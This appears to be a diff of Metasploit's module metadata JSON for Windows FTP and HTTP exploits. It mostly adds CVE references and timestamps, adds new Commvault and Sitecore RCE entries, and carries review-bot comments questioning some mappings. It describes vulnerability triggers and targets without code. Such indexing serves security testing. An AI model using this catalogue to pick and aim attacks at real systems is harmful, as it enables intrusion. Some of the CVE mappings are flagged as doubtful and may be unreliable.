@@ -167063,7 +168373,7 @@
"targets": [
"XP SP3 Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/gekkomgr_list_reply",
@@ -167348,6 +168658,7 @@
],
"description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n This issue is triggered when a file with a long name is downloaded/opened.",
"references": [
"CVE-2010-20049",
"OSVDB-68640",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
@@ -167359,7 +168670,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/leapftp_list_reply",
@@ -167551,6 +168862,7 @@
],
"description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n triggered when processing the response on a LIST command. During the overflow,\n a structured exception handler record gets overwritten.",
"references": [
"CVE-2010-10014",
"OSVDB-68824",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
@@ -167562,7 +168874,7 @@
"targets": [
"XP SP3 Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/odin_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/odin_list_reply",
@@ -167897,6 +169209,7 @@
],
"description": "This module exploits a vulnerability found in QuickShare File Server's FTP\n service. By supplying \"../\" in the file path, it is possible to trigger a\n directory traversal flaw, allowing the attacker to read a file outside the\n virtual directory. By default, the \"Writable\" option is enabled during account\n creation, therefore this makes it possible to create a file at an arbitrary\n location, which leads to remote code execution.",
"references": [
"CVE-2011-10010",
"OSVDB-70776",
"EDB-16105",
"URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html",
@@ -167918,7 +169231,7 @@
"targets": [
"QuickShare File Server 1.2.1"
],
"mod_time": "2025-06-06 12:39:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb",
"is_install_path": true,
"ref_name": "windows/ftp/quickshare_traversal_write",
@@ -168004,6 +169317,7 @@
],
"description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.",
"references": [
"CVE-2008-5106",
"OSVDB-90815",
"BID-58247",
"EDB-24557"
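Review bot: CVE-2008-5106 predates every other identifier in this hunk (OSVDB-90815, BID-58247, EDB-24557) by about five years, and the description ties the LIST overflow to viewing the "Log" tab in the management application; confirm the 2008 CVE describes that same trigger and not an earlier Sami FTP Server issue before it is added as the canonical reference.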
@@ -168021,7 +169335,7 @@
"targets": [
"Sami FTP Server 2.0.1 / Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb",
"is_install_path": true,
"ref_name": "windows/ftp/sami_ftpd_list",
@@ -168211,6 +169525,7 @@
],
"description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n triggered when the ftp client processes a response to a LIST command. If the\n response contains an overly long file/folder name, a buffer overflow occurs,\n overwriting a structured exception handler.",
"references": [
"CVE-2010-20007",
"OSVDB-94556",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
@@ -168222,7 +169537,7 @@
"targets": [
"XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/seagull_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/seagull_list_reply",
@@ -168458,6 +169773,7 @@
],
"description": "This module exploits a buffer overflow vulnerability found in the PORT\n command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n code execution under the context of SYSTEM.",
"references": [
"CVE-2012-10035",
"EDB-22161",
"OSVDB-85887"
],
@@ -168476,7 +169792,7 @@
"Windows Universal TurboFtp 1.30.823",
"Windows Universal TurboFtp 1.30.826"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/turboftp_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/turboftp_port",
@@ -168509,6 +169825,7 @@
],
"description": "This module exploits an out-of-bounds array access in the Arcane Software\n Vermillion FTP server. By sending a specially crafted FTP PORT command,\n an attacker can corrupt stack memory and execute arbitrary code.\n\n This particular issue is caused by processing data bound by attacker\n controlled input while writing into a 4 byte stack buffer. Unfortunately,\n the writing that occurs is not a simple byte copy.\n\n Processing is done using a source ptr (p) and a destination pointer (q).\n The vulnerable function walks the input string and continues while the\n source byte is non-null. If a comma is encountered, the function increments\n the destination pointer. If an ascii digit [0-9] is encountered, the\n following occurs:\n\n *q = (*q * 10) + (*p - '0');\n\n All other input characters are ignored in this loop.\n\n As a consequence, an attacker must craft input such that modifications\n to the current values on the stack result in usable values. In this exploit,\n the low two bytes of the return address are adjusted to point at the\n location of a 'call edi' instruction within the binary. This was chosen\n since 'edi' points at the source buffer when the function returns.\n\n NOTE: This server can be installed as a service using \"vftpd.exe install\".\n If so, the service does not restart automatically, giving an attacker only\n one attempt.",
"references": [
"CVE-2010-20115",
"OSVDB-62163",
"EDB-11293"
],
@@ -168526,7 +169843,7 @@
"Automatic Targeting",
"vftpd 1.31 - Windows XP SP3 English"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/vermillion_ftpd_port",
@@ -168716,6 +170033,7 @@
],
"description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n This issue is triggered when a client connects to the server and is\n expecting the Server Ready response.",
"references": [
"CVE-2025-34107",
"EDB-40693",
"URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt"
],
@@ -168727,7 +170045,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb",
"is_install_path": true,
"ref_name": "windows/ftp/winaxe_server_ready",
@@ -168761,6 +170079,7 @@
],
"description": "This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.",
"references": [
"CVE-2025-47812",
"URL-http://www.wftpserver.com",
"URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm"
],
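Review bot: CVE-2025-47812 is added to a module whose description covers the admin-console Lua os.execute() path in Wing FTP Server 3.0.0 and above, while the only other references are generic vendor URLs; confirm the CVE record describes this authenticated admin-console issue rather than a separate, later Wing FTP vulnerability, and add the advisory URL for the CVE so the mapping is checkable from the metadata alone.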
@@ -168785,7 +170104,7 @@
"targets": [
"Wing FTP Server >= 3.0.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wing_ftp_admin_exec",
@@ -168922,6 +170241,7 @@
],
"description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n through an excessively long PWD message.",
"references": [
"CVE-2010-20122",
"OSVDB-63968",
"EDB-12332"
],
@@ -168933,7 +170253,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/xftp_client_pwd",
@@ -169567,6 +170887,7 @@
],
"description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n Library Management System (NetOpacs). The webquery.dll\n API is available through IIS requests. By specifying\n an overly long string to the 'app' parameter, SeH can be\n reliably overwritten allowing for arbitrary remote code execution.\n In addition, it is possible to overwrite EIP by specifying\n an arbitrary parameter name with an '=' terminator.",
"references": [
"CVE-2010-20112",
"OSVDB-66814",
"BID-42293",
"URL-http://www.aushack.com/advisories/"
@@ -169579,7 +170900,7 @@
"targets": [
"Windows 2000 Pro All - English"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb",
"is_install_path": true,
"ref_name": "windows/http/amlibweb_webquerydll_app",
@@ -170244,6 +171565,7 @@
],
"description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n 4.0.2 build 1219. When sending a specially crafted http request,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-20009",
"OSVDB-54395",
"BID-34033",
"EDB-8173"
@@ -170269,7 +171591,7 @@
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/belkin_bulldog.rb",
"is_install_path": true,
"ref_name": "windows/http/belkin_bulldog",
@@ -170681,6 +172003,71 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/http/commvault_rce_cve_2025_57790_cve_2025_57791": {
"name": "Commvault Command-Line Argument Injection to Traversal Remote Code Execution",
"fullname": "exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-08-19",
"type": "exploit",
"author": [
"Sonny Macdonald",
"Piotr Bazydlo",
"remmons-r7"
],
"description": "This module exploits an unauthenticated remote code execution exploit chain for Commvault,\n tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated\n access to the 'localadmin' account, which then facilitates code execution via expression\n language injection. CVE-2025-57788 is also leveraged to leak the target host name, which is\n necessary knowledge to exploit the remote code execution chain. This module executes in\n the context of 'NETWORK SERVICE' on Windows.",
"references": [
"CVE-2025-57790",
"CVE-2025-57791",
"CVE-2025-57788",
"URL-https://documentation.commvault.com/securityadvisories/CV_2025_08_1.html",
"URL-https://documentation.commvault.com/securityadvisories/CV_2025_08_2.html",
"URL-https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
],
"platform": "Windows",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Default"
],
"mod_time": "2025-09-15 11:19:49 +0000",
"path": "/modules/exploits/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791.rb",
"is_install_path": true,
"ref_name": "windows/http/commvault_rce_cve_2025_57790_cve_2025_57791",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk",
"config-changes"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_windows/http/cyclope_ess_sqli": {
"name": "Cyclope Employee Surveillance Solution v6 SQL Injection",
"fullname": "exploit/windows/http/cyclope_ess_sqli",
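Review bot: the third URL in the new Commvault entry's "references" array points at an EclecticIQ post about Ivanti Endpoint Manager Mobile and CVE-2025-4428, which is unrelated to the Commvault CVEs this module covers (CVE-2025-57790, CVE-2025-57791, CVE-2025-57788); it looks like a copy-paste from another module and should be replaced with the Commvault write-up the description is based on, or dropped. Since this JSON is generated, the fix belongs in the module's References list rather than here. The rest of the entry is internally consistent: "config-changes" and "artifacts-on-disk" in SideEffects match "needs_cleanup": true, and "arch": "cmd" matches the description of command execution as NETWORK SERVICE.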
@@ -170694,6 +172081,7 @@
],
"description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n Solution. Because the login script does not properly handle the user-supplied\n username parameter, a malicious user can manipulate the SQL query, and allows\n arbitrary code execution under the context of 'SYSTEM'.",
"references": [
"CVE-2012-10047",
"OSVDB-84517",
"EDB-20393"
],
@@ -170718,7 +172106,7 @@
"targets": [
"Cyclope Employee Surveillance Solution v6.2 or older"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb",
"is_install_path": true,
"ref_name": "windows/http/cyclope_ess_sqli",
@@ -170933,6 +172321,7 @@
],
"description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n 9.0.34. If a malicious user sends a malicious HTTP login request,\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account. Due to size constraints, this module\n uses the Egghunter technique.",
"references": [
"CVE-2025-34108",
"EDB-40452"
],
"platform": "Windows",
@@ -170956,7 +172345,7 @@
"targets": [
"Disk Pulse Enterprise 9.0.34"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/disk_pulse_enterprise_bof",
@@ -170990,6 +172379,7 @@
],
"description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n 9.9.16. If a malicious user sends a crafted HTTP GET request\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account.",
"references": [
"CVE-2017-13696",
"EDB-42560"
],
"platform": "Windows",
@@ -171013,7 +172403,7 @@
"targets": [
"Disk Pulse Enterprise 9.9.16"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb",
"is_install_path": true,
"ref_name": "windows/http/disk_pulse_enterprise_get",
@@ -171049,6 +172439,7 @@
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2025-34105",
"EDB-40869",
"EDB-42395"
],
@@ -171076,7 +172467,7 @@
"DiskBoss Enterprise v7.5.12",
"DiskBoss Enterprise v8.2.14"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/diskboss_get_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/diskboss_get_bof",
@@ -171482,6 +172873,7 @@
],
"description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.",
"references": [
"CVE-2017-9544",
"EDB-42155"
],
"platform": "Windows",
@@ -171505,7 +172897,7 @@
"targets": [
"Easy Chat Server 2.0 to 3.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/easychatserver_seh.rb",
"is_install_path": true,
"ref_name": "windows/http/easychatserver_seh",
@@ -171539,6 +172931,7 @@
],
"description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.",
"references": [
"CVE-2025-34096",
"EDB-42186"
],
"platform": "Windows",
@@ -171549,7 +172942,7 @@
"targets": [
"Easy File Sharing 7.2 HTTP"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/easyfilesharing_post.rb",
"is_install_path": true,
"ref_name": "windows/http/easyfilesharing_post",
@@ -171582,6 +172975,7 @@
],
"description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.",
"references": [
"CVE-2018-9059",
"EDB-39008"
],
"platform": "Windows",
@@ -171592,7 +172986,7 @@
"targets": [
"Easy File Sharing 7.2 HTTP"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/easyfilesharing_seh.rb",
"is_install_path": true,
"ref_name": "windows/http/easyfilesharing_seh",
@@ -171626,6 +173020,7 @@
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n EasyFTP allows anonymous access by default; valid credentials are typically\n unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n Due to limited space, as well as difficulties using an egghunter, the use of\n staged, ORD, and/or shell payloads is recommended.",
"references": [
"CVE-2010-20113",
"OSVDB-66614",
"EDB-11500"
],
@@ -171650,7 +173045,7 @@
"targets": [
"Windows XP SP3 - Easy FTP Server Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/easyftp_list.rb",
"is_install_path": true,
"ref_name": "windows/http/easyftp_list",
@@ -172525,6 +173920,7 @@
],
"description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.",
"references": [
"CVE-2024-23985",
"OSVDB-83065",
"BID-54056",
"EDB-19266",
@@ -172538,7 +173934,7 @@
"targets": [
"EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/ezserver_http.rb",
"is_install_path": true,
"ref_name": "windows/http/ezserver_http",
@@ -175518,6 +176914,7 @@
],
"description": "This module exploits a stack buffer overflow in Race river's Integard Home/Pro\n internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n vulnerable.\n\n The administration web page on port 18881 is vulnerable to a remote buffer overflow\n attack. By sending a long character string in the password field, both the structured\n exception handler and the saved extended instruction pointer are over written, allowing\n an attacker to gain control of the application and the underlying operating system\n remotely.\n\n The administration website service runs with SYSTEM privileges, and automatically\n restarts when it crashes.",
"references": [
"CVE-2010-5333",
"OSVDB-67909",
"URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061"
],
@@ -175544,7 +176941,7 @@
"Integard Home 2.0.0.9021",
"Integard Pro 2.2.0.9026"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/integard_password_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/integard_password_bof",
@@ -175577,6 +176974,7 @@
],
"description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2009-20005",
"OSVDB-60549",
"BID-37177"
],
@@ -175601,7 +176999,7 @@
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/intersystems_cache.rb",
"is_install_path": true,
"ref_name": "windows/http/intersystems_cache",
@@ -175635,6 +177033,7 @@
],
"description": "This module exploits a boundary condition error in Intrasrv Simple Web\n Server 1.0. The web interface does not validate the boundaries of an\n HTTP request string prior to copying the data to an insufficiently sized\n buffer. Successful exploitation leads to arbitrary remote code execution\n in the context of the application.",
"references": [
"CVE-2019-17181",
"OSVDB-94097",
"EDB-18397",
"BID-60229"
@@ -175647,7 +177046,7 @@
"targets": [
"v1.0 - XP / Win7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/intrasrv_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/intrasrv_bof",
@@ -175981,6 +177380,7 @@
],
"description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n 6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous\n authentication, leading to arbitrary code execution with IUSR privileges.",
"references": [
"CVE-2013-10034",
"OSVDB-99984",
"BID-63782",
"EDB-29675",
@@ -176007,7 +177407,7 @@
"targets": [
"Kaseya KServer / Windows"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/kaseya_uploadimage_file_upload",
@@ -177507,6 +178907,7 @@
],
"description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n The software contains a file upload vulnerability that allows an\n unauthenticated remote attacker to write arbitrary files to the file system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.",
"references": [
"CVE-2013-10047",
"OSVDB-92198",
"OSVDB-92200",
"PACKETSTORM-121168"
@@ -177532,7 +178933,7 @@
"targets": [
"MiniWeb build 300 on Windows (Before Vista)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb",
"is_install_path": true,
"ref_name": "windows/http/miniweb_upload_wbem",
@@ -178134,6 +179535,7 @@
],
"description": "This module allows an attacker with knowledge of the admin password of NSClient++\n to start a privilege shell.\n For this module to work, both web interface of NSClient++ and `ExternalScripts` feature\n should be enabled.",
"references": [
"CVE-2025-34079",
"EDB-48360"
],
"platform": "Windows",
@@ -178157,7 +179559,7 @@
"targets": [
"Windows"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/nscp_authenticated_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/nscp_authenticated_rce",
@@ -178246,6 +179648,7 @@
],
"description": "This module can be used to execute a payload on an Octopus Deploy server given\n valid credentials or an API key. The payload is executed as a powershell script step\n on the Octopus Deploy server during a deployment.",
"references": [
"CVE-2018-18850",
"URL-https://octopus.com"
],
"platform": "Windows",
@@ -178269,7 +179672,7 @@
"targets": [
"Windows Powershell"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb",
"is_install_path": true,
"ref_name": "windows/http/octopusdeploy_deploy",
@@ -179290,6 +180693,7 @@
],
"description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n By supplying a malformed HTTP request, it is possible to trigger a stack-based\n buffer overflow when generating a log, which may result in arbitrary code\n execution under the context of the user.",
"references": [
"CVE-2012-10058",
"OSVDB-79007",
"URL-http://aluigi.altervista.org/adv/r4_1-adv.txt"
],
@@ -179314,7 +180718,7 @@
"targets": [
"R4 v1.25"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb",
"is_install_path": true,
"ref_name": "windows/http/rabidhamster_r4_log",
@@ -179805,6 +181209,7 @@
],
"description": "This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API which\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.",
"references": [
"CVE-2025-34101",
"OSVDB-41961",
"PACKETSTORM-142387",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php",
@@ -179831,7 +181236,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/serviio_checkstreamurl_cmd_exec",
@@ -180529,6 +181934,126 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/http/sitecore_xp_cve_2025_34510": {
"name": "Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution",
"fullname": "exploit/windows/http/sitecore_xp_cve_2025_34510",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-06-17",
"type": "exploit",
"author": [
"Piotr Bazydlo",
"msutovsky-r7"
],
"description": "This module exploits CVE-2025-34510, path traversal leading to remote code execution. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.",
"references": [
"CVE-2025-34510",
"URL-https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform",
"URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows"
],
"mod_time": "2025-09-11 11:04:34 +0000",
"path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_34510.rb",
"is_install_path": true,
"ref_name": "windows/http/sitecore_xp_cve_2025_34510",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/http/sitecore_xp_cve_2025_34511": {
"name": "Sitecore XP CVE-2025-34511 Post-Authentication File Upload",
"fullname": "exploit/windows/http/sitecore_xp_cve_2025_34511",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-06-17",
"type": "exploit",
"author": [
"Piotr Bazydlo",
"msutovsky-r7"
],
"description": "This module exploits CVE-2025-34511, a file upload vulnerability in PowerShell extensions. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.",
"references": [
"CVE-2025-34511",
"URL-https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform",
"URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows"
],
"mod_time": "2025-09-11 11:04:34 +0000",
"path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_34511.rb",
"is_install_path": true,
"ref_name": "windows/http/sitecore_xp_cve_2025_34511",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/http/smartermail_rce": {
"name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution",
"fullname": "exploit/windows/http/smartermail_rce",
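Review bot: both new Sitecore entries have "post_auth": false and "default_credential": false while their names say "Post-Authentication" and their descriptions state that the foothold comes from the hardcoded ServicesAPI credentials of CVE-2025-34509; a module that authenticates with a vendor-shipped credential is the case "default_credential" exists for, so the module classes should set that flag (and the name should be reconsidered if no user-supplied credential is needed). CVE-2025-34509 is also exploited by both modules according to the descriptions but is absent from both "references" arrays, which only list CVE-2025-34510 and CVE-2025-34511 respectively; adding it keeps the metadata searchable by that ID.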
@@ -180961,6 +182486,7 @@
],
"description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n can send a long string data in the Connection Header to causes an overflow on the\n stack when function vsprintf() is used, and gain arbitrary code execution. The\n module has been tested successfully on Windows 7 SP1 and Windows XP SP3.",
"references": [
"CVE-2012-10053",
"OSVDB-84310",
"EDB-19937",
"URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/"
@@ -180986,7 +182512,7 @@
"targets": [
"SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/sws_connection_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/sws_connection_bof",
@@ -181706,6 +183232,7 @@
],
"description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n The payload is uploaded as an ASPX script by sending a specially crafted\n SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n traversal vulnerability, allowing code to be placed into the web-accessible\n /umbraco/ directory.\n\n The module writes, executes and then overwrites an ASPX script; note that\n though the script content is removed, the file remains on the target. Automatic\n cleanup of the file is intended if a meterpreter payload is used.\n\n This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows\n 7 32-bit SP1. In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n write permissions on the Windows Temp folder.",
"references": [
"CVE-2012-10054",
"OSVDB-83765",
"EDB-19671",
